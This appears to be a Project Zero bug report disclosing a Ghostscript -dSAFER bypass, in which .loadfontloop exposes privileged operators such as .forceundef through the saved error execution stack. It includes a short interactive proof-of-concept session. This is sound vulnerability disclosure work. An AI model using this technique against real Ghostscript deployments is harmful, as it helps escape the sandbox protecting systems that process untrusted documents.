ghostscript: .loadfontloop exposes system operators in saved execution stack. While testing the fix for <a href="/p/project-zero/issues/detail?id=1690" title="ghostscript: $error object can expose system operators in saved execution stack." class="closed_ref" rel="nofollow"> bug 1690 </a>, I found a variation that still works: $ ./gs -dSAFER -sDEVICE=ppmraw GPL Ghostscript GIT PRERELEASE 9.26 (2018-09-13) Copyright (C) 2018 Artifex Software, Inc. All rights reserved. This software comes with NO WARRANTY: see the file PUBLIC for details. GS>systemdict /.loadfontloop get stopped == clear true GS>$error /estack get 27 get 18 get 14 get == --.forceundef-- GS> .forceundef is bad enough, but .putgstringcopy is also in there, which is basically a wrapper around .forceput. Filed upstream as <a href="https://bugs.ghostscript.com/show_bug.cgi?id=699938" title="" class="" rel="nofollow">https://bugs.ghostscript.com/show_bug.cgi?id=699938</a> This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. Found by: taviso